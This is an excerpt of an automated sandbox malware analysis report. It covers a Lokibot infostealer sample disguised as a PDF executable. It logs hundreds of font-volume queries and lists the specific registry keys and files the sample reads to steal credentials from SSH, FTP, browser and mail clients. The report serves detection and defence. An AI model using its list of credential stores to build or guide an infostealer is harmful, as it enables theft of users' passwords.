              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00406069 GetUserNameW,
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572, type: MEMORY
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: SmtpPassword
              Source: Yara matchFile source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572, type: MEMORY
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
